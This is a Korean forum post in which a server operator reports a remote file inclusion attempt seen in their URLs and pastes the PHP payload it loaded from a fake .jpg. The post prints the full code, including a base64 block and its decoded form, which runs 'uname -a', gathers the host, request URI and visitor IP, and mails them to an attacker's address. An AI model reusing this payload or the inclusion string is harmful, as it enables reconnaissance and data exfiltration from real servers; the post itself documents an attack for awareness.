사이트 내 전체검색
JPG 해킹 한것...
대림동도끼
https://cmd.kr/server/920 URL이 복사되었습니다.

본문

주소창뒤에 ~~~~~~~~page=0//redirect.php?url=http://beldoors.org/logs/vero.jpg?
이라는것이 있어 파일을 로드해보니 서버정보를
unixon2010@gmail.com
 에게 보내는 소스이다..
나쁜놈들..

<?
$win = strtolower(substr(PHP_OS,0,3)) == "win";
echo "PLaTo<br>";
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
 $safemode = true;
 $hsafemode = "4ON6";
}
else {$safemode = false; $hsafemode = "3OFF6";}
$xos = wordwrap(php_uname(),90,"<br>",1);
$xpwd = @getcwd();
$OS = "<<".$hsafemode.">> ".$xos."";
echo "<center><A class=ria href=\"http://".$OS."\">";echo "PLaTo</A></center><br>";
echo "<br>OSTYPE:$OS<br>";
echo "<br>Pwd:$xpwd<br>";
echo "<xmp>";
$buff=base64_decode("aWYgKEBpbmlfZ2V0KCJzYWZlX21vZGUiKSBvciBzdHJ0b2xvd2VyKEBpbmlfZ2V0KCJzYWZlX21vZGUiKSkgPT0gIm9uIikgeyAkc2FmZW1vZGUgPSAiT04iOyB9IGVsc2UgeyAkc2FmZW1vZGUgPSAiT0ZGIjsgfSAkdmlzaXRvciA9ICRfU0VSVkVSWyJSRU1PVEVfQUREUiJdOyAkZmxvYXQgPSAiRnJvbSA6IHZ1cmwgaW5mbyA8ZnVsbEBpbmZvLmNvbT4iOyAkYXJhbiA9IGV4ZWMoJ3VuYW1lIC1hOycpOyAkd2ViID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdOyAkaW5qID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07ICRib2R5ID0gIkJ1ZyBodHRwOi8vIi4kd2ViLiRpbmouIm5uU3ByZWFkIFZpYSA6ICIuJHZpc2l0b3IuIm5uS2VybmVsIFZlcnNpb24gOiAiLiRhcmFuLiJublNhZmUgTW9kZSA6ICIuJHNhZmVtb2RlOyBtYWlsKCJ1bml4b24yMDEwQGdtYWlsLmNvbSIsIlNldG9yYW4gQm9zICIuJHNhZmVtb2RlLCRib2R5LCRmbG9hdCk7");
echo $buff;
echo "</xmp>";
die("<center> ByroeNet </center>");

 

//Pwd:
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
 { $safemode = "ON";
} else {
 $safemode = "OFF";
}
$visitor = $_SERVER["REMOTE_ADDR"];
$float = "From : vurl info <full@info.com>";
$aran = exec('uname -a;');
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "Bug http://".$web.$inj."nnSpread Via : ".$visitor."nnKernel Version : ".$aran."nnSafe Mode : ".$safemode;
mail("unixon2010@gmail.com","Setoran Bos ".$safemode,$body,$float);
?>

댓글목록

등록된 댓글이 없습니다.

1,139 (6/23P)

Search

Copyright © Cmd 명령어 3.139.67.228